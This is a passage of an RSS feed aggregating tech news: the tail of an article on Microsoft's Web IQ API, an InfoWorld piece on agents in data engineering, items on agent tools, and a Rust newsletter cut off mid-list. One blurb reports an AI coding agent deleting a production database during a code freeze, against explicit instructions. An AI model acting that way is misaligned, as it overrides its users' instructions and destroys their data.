<p class="wp-block-paragraph">Responses to <a href="https://webiq.microsoft.ai/documentation/api-reference/videos/" data-type="link" data-id="https://webiq.microsoft.ai/documentation/api-reference/videos/">video searches</a> include text descriptions. If these aren’t provided as part of the original web content, they will be generated by an LLM. The same approach is used for <a href="https://webiq.microsoft.ai/documentation/api-reference/images/" data-type="link" data-id="https://webiq.microsoft.ai/documentation/api-reference/images/">image searches</a>, with both offering the same contextual cues as the web search API. If you don’t care about the type of data being returned, you can choose a “<a href="https://webiq.microsoft.ai/documentation/api-reference/classic/" data-type="link" data-id="https://webiq.microsoft.ai/documentation/api-reference/classic/">classic search</a>,” which will return text, images, video, and news.</p>



<h2 class="wp-block-heading">Supporting autonomous agents</h2>



<p class="wp-block-paragraph">Microsoft provides LLM-ready documentation for the Web IQ service, with an <code>llms.txt</code> file and an OpenAPI description. These allow AI tools to discover Web IQ capabilities and include them in workflows as part of autonomous operations, so that agents and other AI applications can implement grounding calls to Web IQ whenever user interactions require them. The API <a href="https://webiq.microsoft.ai/documentation/error-handling/">descriptions include errors</a> as well as the structure of a standard 200 response.</p>



<p class="wp-block-paragraph">As Web IQ is designed for use by modern agent frameworks, the Web IQ API is available through an MCP server. The <a href="https://webiq.microsoft.ai/documentation/mcp/" data-type="link" data-id="https://webiq.microsoft.ai/documentation/mcp/">Web IQ MCP server</a> exposes tools that map to API calls: web, videos, news, and images. They also include a browse option, which lets you pull content from a target URL. The service can be configured with a standard JSON file and requires an API key to control access and manage billing. If your account doesn’t have access to a specific tool, then it won’t be available from inside the MCP server.</p>



<p class="wp-block-paragraph">If you’re building an agent and you want to evaluate the Web IQ MCP server, it can be added to common coding agents, such as the GitHub Copilot CLI. You can then test it out using familiar tools and generate code that can be dropped into applications via your choice of development tooling. Queries sent to the Web IQ MCP server use the same syntax as REST calls, without having to construct the calls yourself. Working with the MCP server allows you to connect Web IQ to your choice of agent framework, relying on its built-in MCP methods to reduce the code and maintenance overhead.</p>



<p class="wp-block-paragraph">Web IQ is not for human interactions; Microsoft provides an alternative “<a href="https://learn.microsoft.com/en-us/azure/foundry-classic/agents/how-to/tools-classic/bing-grounding?view=azure-python-preview&amp;tabs=python&amp;pivots=overview">Grounding with Bing</a>” service for chatbots. Instead, Web IQ is a tool for agents, providing necessary background information that helps keep results fresh and relevant. It’s easy to use, fast, and, above all, cheap, which makes it an ideal tool for modern inference platforms built around Microsoft Azure’s AI tooling.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agents are coming for data (just slowly)]]></title>
<description><![CDATA[Agents have turned up just about everywhere in software this past year, with one conspicuous exception: data. That’s a little odd, because querying data is exactly the kind of structured, checkable task that agents excel at. The likeliest culprit is timing. Large language models have only been re...]]></description>
<link>https://tsecurity.de/de/3707920/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707920/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 13:18:55 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Agents have turned up just about everywhere in software this past year, with one conspicuous exception: data. That’s a little odd, because querying data is exactly the kind of structured, checkable task that agents excel at. The likeliest culprit is timing. <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" data-type="link" data-id="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">Large language models</a> have only been reliably good at writing <a href="https://www.infoworld.com/article/2255395/what-is-sql-the-lingua-franca-of-data-analysis.html" data-type="link" data-id="https://www.infoworld.com/article/2255395/what-is-sql-the-lingua-franca-of-data-analysis.html">SQL</a> for the last six to nine months, and the field hasn’t caught up to what that unlocks. It’s worth separating two flavors of the idea: agents that <em>do</em> analytics, and agents that help you run the data plumbing. Both turn out to be more useful than they first look.</p>



<p class="wp-block-paragraph">Data engineering is hard mostly because you’re at the mercy of systems you don’t control. Schemas change without warning. Sources go offline. The API you pull from ships a new version. A column that only ever holds integers starts returning decimals. A field you assumed was unique sprouts duplicates, and the next join detonates into a Cartesian explosion. Records go missing, or come back wrong for an hour and then quietly fix themselves. If nothing ever changed, data engineering would be easy. But as they say, the only constant is change.</p>



<h2 class="wp-block-heading">The boring work is where agents thrive</h2>



<p class="wp-block-paragraph">Unglamorous maintenance is something agents are genuinely good at. Every data model is a stack of assumptions: this is unique, that’s always populated, these two tables join cleanly. An agent can read those assumptions out of your code and turn them into tests that check whether they still hold. A lot of the fixes are mechanical anyway: a table got renamed, a type got widened, a column moved. An agent can often patch those on its own, and when it can’t, it can still do the legwork, tracing what changed and handing a human a diagnosis and a proposed fix instead of just a 3am stack trace.</p>



<p class="wp-block-paragraph">Context is the other half of the story, and the context landscape is honestly a mess. Vendors are working hard to convince you that only their semantic modeling language can save you, while it is not entirely clear whether these are necessary or even sufficient. Whether you keep your business logic in a semantic layer like <a href="https://github.com/dbt-labs/metricflow" data-type="link" data-id="https://github.com/dbt-labs/metricflow">MetricFlow</a> or <a href="https://github.com/malloydata/malloy" data-type="link" data-id="https://github.com/malloydata/malloy">Malloy</a>, or just in plain <a href="https://www.infoworld.com/article/3983394/what-is-markdown-lightweight-text-formatting-for-human-beings.html" data-type="link" data-id="https://www.infoworld.com/article/3983394/what-is-markdown-lightweight-text-formatting-for-human-beings.html">Markdown</a>, the goal is the same: get that logic into a form an LLM can use. Context is almost always created by hand, and like all hand-written documentation, it starts drifting the moment it gets written down.</p>



<p class="wp-block-paragraph">This highlights an opportunity, namely that agents are good at precisely the parts of context that are mechanical and bad at precisely the parts that aren’t. An agent can infer which tables join to which, what values a column tends to hold, what your sales regions are, and which tables people actually query. What it can’t infer is the stuff that was never really a data question: the <em>right</em> way to calculate revenue, what counts as a “customer,” when the fiscal year starts. Those aren’t facts hiding in the warehouse waiting to be found. They’re decisions, often business ones, that a person has to make. What an agent can do is flag the moment one of them quietly stops being true.</p>



<h2 class="wp-block-heading">Automated agent insights remain a fantasy</h2>



<p class="wp-block-paragraph">The flashier pitch, where agents surface insights you never asked for, is the one I’d bet on last. It sounds wonderful to have hands-free analytics. An agent will keep watch over your data, notice what matters, and drop a dashboard tailored to whatever is happening today. But the bar is high for relevance and false positives can make human users lose confidence. </p>



<p class="wp-block-paragraph">Deterministic alerting systems have the same problem. People end up turning off alarms because they are too hard to tune. But if humans writing pre-canned triggers have a hard time getting it right, it is going to be hard for agents to do better (at least not before we get some form of super-intelligence). While I’d expect proactive insights to be part of the future, they are still a research prototype at this point.</p>



<p class="wp-block-paragraph">Here are three concrete things a data team should do to get their stack ready for agents:</p>



<ol class="wp-block-list">
<li>Lay the groundwork first. Agent use cases that are compelling sit on top of groundwork most teams haven’t laid yet. You don’t need an agent to curate your context until you’ve decided how your context is going to work in the first place.</li>



<li>Then go after context. Write a handful of evals, automate them, and then wait to see what breaks. Evals are the load-bearing part. They’re what makes it safe to let an agent near your pipeline at all, because they tell you the instant it gets something wrong.</li>



<li>Run on infrastructure that fits how agents behave. An agent goes from zero to a flood of queries in an instant, so you want something that scales up and back down quickly. Agents also fan out, chasing several threads at once, so you need both the headroom and the tenant isolation to absorb a burst. One agent’s curiosity shouldn’t take down everyone else’s ability to run queries.</li>
</ol>



<h2 class="wp-block-heading">Latency is a bigger deal than it looks</h2>



<p class="wp-block-paragraph">Latency matters more than you’d expect when you’re using agents. While you might be waiting seconds or minutes for Claude Code to do its thing, it is often running a bunch of tasks. Part of the time that the agent spends is waiting for the LLM, but an increasing amount of time is using other tools, like querying a database. Over time, you can expect LLMs to get a lot faster; you can use smaller models, smarter models, local models, or fancier GPUs. As that happens the tools that an agent uses become the bottleneck.</p>



<p class="wp-block-paragraph">Picture two engines: one answers in 10 milliseconds, the other in 100. A person won’t notice the difference because both feel near instantaneous, and a person will spend far longer thinking up the next question than either engine spends answering it. What feels instantaneous to an agent is very different, and it doesn’t need to stop and think. When its next query depends on the last result, that 10x gap compounds straight into 10x more work per minute.</p>



<p class="wp-block-paragraph">One of the ways to make an agent go faster is to take more of their work and run it in parallel. But this also increases load on the systems. You’d want to make sure you have enough parallel capacity and isolation to be able to scale to all of the parallel agent queries at once. Engines tuned for human patience and engines tuned for agent throughput are not the same engines.</p>



<p class="wp-block-paragraph">The agentic wave is coming whether or not any given team is ready, and the best time to start preparing yourself and your stack is now, before the queries start pouring in. This isn’t just future proofing. The teams that move early are the ones who work out the patterns everyone else ends up copying. A little curiosity now buys a real head start later.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your AI Agent Isn’t a Static Artifact. It’s Growing Up.]]></title>
<description><![CDATA[In July 2025, an AI coding agent on Replit deleted a production database belonging to SaaStr founder Jason Lemkin. It did this during an explicit code freeze. Lemkin had told the agent, in capital letters, not to change anything. The agent ran destructive commands anyway, wiped records on more th...]]></description>
<link>https://tsecurity.de/de/3707914/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707914/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 13:18:36 +0200</pubDate>
<content:encoded><![CDATA[In July 2025, an AI coding agent on Replit deleted a production database belonging to SaaStr founder Jason Lemkin. It did this during an explicit code freeze. Lemkin had told the agent, in capital letters, not to change anything. The agent ran destructive commands anyway, wiped records on more than a thousand executives and companies, […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Prime Intellect Releases Prime Agent: An Open-Source RLM Harness Where Sub-Agents Are Function Calls Inside Persistent IPython Kernel]]></title>
<description><![CDATA[Prime Intellect has open-sourced Prime Agent, a coding and research harness built on two abstractions: the Recursive Language Model, which turns sub-agent calls into functions inside a persistent IPython kernel, and the Continual Harness, which lets the agent edit its own prompts, skills, memory,...]]></description>
<link>https://tsecurity.de/de/3707913/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707913/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 13:18:35 +0200</pubDate>
<content:encoded><![CDATA[<p>Prime Intellect has open-sourced Prime Agent, a coding and research harness built on two abstractions: the Recursive Language Model, which turns sub-agent calls into functions inside a persistent IPython kernel, and the Continual Harness, which lets the agent edit its own prompts, skills, memory, and sub-agent specs mid-run. With Opus 5 it reports 95.5% RHAE Best@1 on ARC-AGI-3, above the reported human expert baseline of 95.4%.</p>
<p>The post <a href="https://www.marktechpost.com/2026/08/06/prime-intellect-releases-prime-agent/">Prime Intellect Releases Prime Agent: An Open-Source RLM Harness Where Sub-Agents Are Function Calls Inside Persistent IPython Kernel</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta Wants Your Coding Data, and It’ll Cut Muse Code Prices by Up to 20x]]></title>
<description><![CDATA[Meta has launched Muse Code, a new terminal-based coding agent for macOS and Linux, with pricing that drops sharply when users allow the company to train future AI models on their prompts and completions.



The new tool runs on Meta’s Muse Spark 1.2 model and can plan code changes, write code, t...]]></description>
<link>https://tsecurity.de/de/3707862/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707862/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 13:15:04 +0200</pubDate>
<content:encoded><![CDATA[Meta has launched Muse Code, a new terminal-based coding agent for macOS and Linux, with pricing that drops sharply when users allow the company to train future AI models on their prompts and completions.



The new tool runs on Meta’s Muse Spark 1.2 model and can plan code changes, write code, test results, and work across large software repositories. Meta has released Muse Code in beta, and Mac users can install it through Terminal with a single command.



Meta Muse Code pricing depends on data access



Meta charges Standard users $1.25 per million input tokens and $4.25 per million output tokens. This tier prevents Meta from using prompts and completions to train its models, which makes it the safer option for developers working with private or sensitive code.



The Contributor tier cuts the price to $0.10 per million input tokens and $0.20 per million output tokens. In exchange, users allow Meta to use their data for model training, which lowers input costs by more than 12 times and output costs by more than 20 times.



The cheaper tier also has lower usage limits, with 60 requests per minute and 2.1 million tokens per minute. Standard users receive up to 3,000 requests per minute and 4 million tokens per minute.



Muse Code also includes built-in commands for planning, reviewing, and completing development tasks. Its local event log records model calls, tool activity, approvals, and edits, which allows the agent to resume work after a crash.



Meta Muse Code directly competes with OpenAI Codex and Anthropic Claude Code, although Meta currently offers no dedicated desktop app. Developers must use the tool through Terminal on macOS or Linux.]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 663]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3707816/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707816/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 13:08:02 +0200</pubDate>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/2026/08/04/enabling-polonius-alpha-on-nightly/">Enabling the next iteration of the borrow checker on nightly</a></li>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/08/04/funding-team-progress-update-july-2026/">Funding team progress update</a></li>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/08/05/rust-langrust-is-adopting-an-llm-policy/">rust-lang/rust is adopting an LLM policy</a></li>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/07/31/all-hands-2026-retrospective/">All Hands 2026 retrospective</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-77">The Embedded Rustacean Issue #77</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://kevat.app/">Kevat 0.4.0 — fast, resumable copy and move to external drives, now with a GUI on all three platforms</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.13.0">kache 0.13.0: keying the env vars proc-macros read</a></li>
<li><a href="https://kunobi.ninja/blog/kobe-101-leasing-kubernetes-clusters">kobe 101: lease a Kubernetes cluster, don't create one</a></li>
<li><a href="https://www.falkordb.com/blog/rewriting-falkordb-in-rust/">Rewriting FalkorDB in Rust: Make It Work, Make It Stable</a></li>
<li><a href="https://webrtc.rs/blog/2026/07/31/announcing-webrtc-v0.20.0.html">Announcing <code>webrtc</code> v0.20.0: Async-Friendly, Runtime-Agnostic WebRTC on Sans-I/O Core <code>rtc</code></a></li>
<li><a href="https://micheletti.io/proxelar-050/">Proxelar 0.5.0: sessions, rules, and more ways to capture traffic</a></li>
<li><a href="https://github.com/jchultarsky/mirador/releases/tag/v1.0.0">mirador 1.0.0: a personal terminal dashboard</a></li>
<li><a href="https://github.com/GCWing/BitFun/releases/tag/v0.2.15">BitFun 0.2.15: an open-source desktop AI agent built on a Rust runtime</a></li>
<li><a href="https://dev.to/sicklefire/mvis-v050-new-release-5997">mvis v0.5.0: CI/CD Profiling &amp; Allocation Histograms</a></li>
<li><a href="https://github.com/kmolan/multicalc-rust/releases/tag/v0.9.0">multicalc 0.9.0: scientific computation for embedded and robotics systems</a></li>
<li><a href="https://poltertype.com/blog/wrong-layout-typing-on-wayland/">Auto-correcting wrong-layout typing on Wayland is nearly impossible. We did it anyway</a></li>
<li><a href="https://github.com/fabperso/wimux/releases/tag/v0.1.0">wimux 0.1.0: a native Windows terminal multiplexer</a></li>
<li><a href="https://github.com/arian-shamaei/anthropometer/tree/main/docs/autopsy">amtr: a btop-style context-window monitor for Claude Code sessions, and the forensic autopsy of its own 153-hour build</a></li>
<li><a href="https://github.com/timescale/rsigma/releases/tag/v0.20.0">RSigma v0.20.0 release</a></li>
<li><a href="https://mostafa.dev/the-state-of-rsigma-7ba0a99020d9">The State of RSigma</a>, and <a href="https://mostafa.dev/the-state-of-rsigma-part-two-the-loop-c114f379dd78">Part Two: The Loop</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://kerkour.com/firecracker-sandboxing-rust">How Firecracker microVMs work under the hood to sandbox untrusted code and AI agents</a></li>
<li><a href="https://pythonspeed.com/articles/faster-float-math-rust/">Faster floating point math with Rust’s new API</a></li>
<li><a href="https://blog.st.com/rust-mems-drivers/">Rust MEMS drivers: 3 reasons to try and adopt our new sensor driver</a></li>
<li><a href="https://alex.draftist.io/blog/the-bedrock-of-software-design-ycqvcedsj">The Bedrock of Software Design | Alex Fedoseev</a></li>
<li><a href="https://lordgoati.us/blog/tail-call/">Tail-Call Interpreters in Rust</a></li>
<li><a href="https://nnethercote.github.io/2026/07/31/how-to-speed-up-the-rust-compiler-in-july-2026.html">How to speed up the Rust compiler in July 2026</a></li>
<li><a href="https://kobzol.github.io/rust/2026/08/03/stf-june-july-2026.html">Sovereign Tech Fellowship for Rust maintenance (June-July 2026 report)</a></li>
<li><a href="https://jmmv.dev/2026/07/hello-getoptsargs.html">An old-new take on argument parsing in Rust</a></li>
<li><a href="https://dmitrii.app/stateless-servers-stateful-payloads-sessions-vs-continuations-measured-in-rust/">Stateless Servers, Stateful Payloads: Sessions vs Continuations, Measured in Rust</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=2937MGszrak">Rust in the age of Generative AI with Niko, Allen &amp; Zeeshan</a></li>
<li>[audio] <a href="https://corrode.dev/podcast/s06e09-jetbrains/">Rust in Production S06 E09: JetBrains with Orhun Parmaksız</a></li>
<li><a href="https://c410-f3r.github.io/thoughts/work-stealing-vs-executor-per-thread-evaluating-different-http-server-workloads-with-tokio-smol-and-glommio/">Work-Stealing vs. Executor-Per-Thread: Evaluating different HTTP server workloads with Tokio, Smol and Glommio</a></li>
<li><a href="https://github.com/Aefinity-AI/alice-aegis/blob/main/docs/posts/2026-08-05_uefi-soft-float-deletes-your-avx2.md">Your <code>#[target_feature(enable = "avx2")]</code> does nothing on <code>x86_64-unknown-uefi</code></a></li>
<li><a href="https://dev.to/fabperso/three-bugs-my-ai-agents-couldnt-fix-13bn">Three bugs my AI agents couldn't fix</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li><a href="https://blog.implrust.com/posts/2026/08/blinky-with-stm32f103c8t6-embedded-rust/">Blinking an LED on STM32 Blue Pill (STM32F103C8T6) with Embedded Rust</a></li>
<li><a href="https://www.greyblake.com/blog/branchless-rust/">Branchless Rust: Making a Filter 4x Faster by Removing an <code>if</code></a></li>
<li><a href="https://oxi-dd65f4.gitlab.io/articles/word-pagination-gdi-rounding.html">Why modern font metrics cannot reproduce Word pagination</a></li>
<li><a href="https://github.com/JuanMarchetto/hooklog/blob/main/ARTICLE.md">Building hooklog on a six-day-old framework</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://crates.io/crates/index_type">index_type</a>, a crate for providing strongly typed indices for collections.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1638">Roee Shoshani</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>


<ul>
<li><a href="https://github.com/luohoa97/cordial/issues/6">Cordial - Unify the two implementations of the profile lock</a></li>
<li><a href="https://github.com/luohoa97/cordial/issues/7">Cordial - Fullscreen clips and letterboxes until the workspace is switched away and back</a></li>
<li><a href="https://github.com/lenra-io/dofigen/issues/481">Dofigen - Extend Dockerfiles</a></li>
</ul>


<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>630 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-07-28..2026-08-04">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/160193">improve CFG traversal</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/160245">perf: avoid a heap allocation per basic block in MoveData's location maps</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159525">stabilize passing 128-bit integers via vector registers with <code>asm!</code> on x86</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159130">a bit optimize four-digit chunks in integer formatting</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/160143">add NEON support for <code>is_ascii</code> and <code>eq_ignore_ascii_case</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159671">add semver check test command for checking API compatibility of stdlib</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/106643">allow only implementing <code>Read::read_buf</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159592">core: implement bounded random sampling</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/160139">iter: specialize <code>Take::count</code> using <code>advance_by</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/160342">iter: specialize <code>advance_by</code> method of <code>Fuse</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/160079">make atomic operations const</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158548">move <code>std::io::copy</code> to <code>alloc::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157572">stabilize <code>size_of_val_raw, align_of_val_raw, Layout::for_value_raw</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17300">add a suggestion when adding <code>[lints]</code> to a workspace to use <code>[workspace.lints]</code> instead</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17301">avoid parsing unchanged lockfiles</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17284">completions: complete paths for cargo run arguments</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17208">fix <code>manual_readme</code> lint for lower-priority README files</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17289">git: make checkout names independent of git config</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17293">make <code>__CARGO_TEST_FORCE_ARGFILE</code> available in distributed builds</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17269">pass rustdoc flags to final CCI merge step</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17268">prevent panic when <code>package.build</code> is empty</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17272">reworked how we enable the new build-dir layout on nightly</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17302">trim-paths: unambiguous and reversible remap rules</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustdoc">Rustdoc</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/157058">label badge for notable traits</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/160032">rustdoc-json: make <code>Stability</code> compatible with non-self-describing serde formats</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/160232">fix ICE when a grapheme cluster joins a Prepend-class character to <code>_</code> or <code>:</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/160208">fix crash when trying to list attributes on an opaque type</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159854">only analyze head of self type when deciding impl inlining</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustfmt">Rustfmt</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/154202">format <code>cfg_select!</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17468"><code>manual_div_ceil</code>: avoid suggestions that change evaluation count</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17473">fix <code>no_effect_underscore_binding</code> false positive on proc-macro generated code</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16773">add check for image with embedded link to <code>doc_paragraphs_missing_punctuation</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16972">lint for UFCS call in <code>clone_on_copy</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17024">trigger <code>float_cmp_const</code> for <code>assert_eq!</code> with const floats</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/23014">allow <code>self</code> as the last segment of a path</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22977">correctly handle unlinked module edge cases</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22959">support <code>CovariantUnsafeCell</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/21846">add <code>-Zjson-target-spec</code> on cargo calls where needed</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/23003">add reference for same name param coerce matches</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/23017">allow diverging rhs in destructuring assignments</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22938">avoid panic when checking <code>Copy</code> for hrtb closure arguments</a></li>
